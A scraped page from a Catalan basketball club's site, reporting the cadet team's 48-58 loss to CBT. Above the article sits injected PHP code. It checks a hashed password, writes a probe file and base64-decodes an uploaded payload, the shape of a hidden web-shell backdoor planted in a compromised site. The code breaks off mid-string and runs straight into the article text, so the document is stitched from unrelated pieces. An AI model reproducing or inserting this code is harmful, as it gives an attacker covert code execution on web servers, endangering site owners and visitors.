function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí 1 no sap gestionar l'avantatge i perd contra el CBT (48-58) - Tgn Bàsquet Club -

El cadet masculí 1 no sap gestionar l’avantatge i perd contra el CBT (48-58)

Updated: març 15, 2016

El cadet masculí 1 va fer un mal quart període i va perdre contra el CBT en un partit que tenia controlat. Els jugadors de Javier García, que van fer un inici de matx prometedor contra un rival físicament més gran, van demostrar tot el seu potencial en el tercer període (18-6 de parcial), un fet que els permetia entrar en el quart quart amb 11 punts d’avantatge. A partir d’aleshores, tot van ser males notícies pels liles. El CBT,  conscient que necessitava canviar el ritme del partit per vèncer, va augmentar la intensitat ofensiva i defensiva. Pressió a tota la pista i molta més agressivitat per atacar el cèrcol i anar al rebot.

El TGN Bàsquet va recular, els jugadors van cometre moltes errades i alguns semblaven indecisos sobre la pista. Així, els visitants van marcar un parcial de 6-27 que va sentenciar.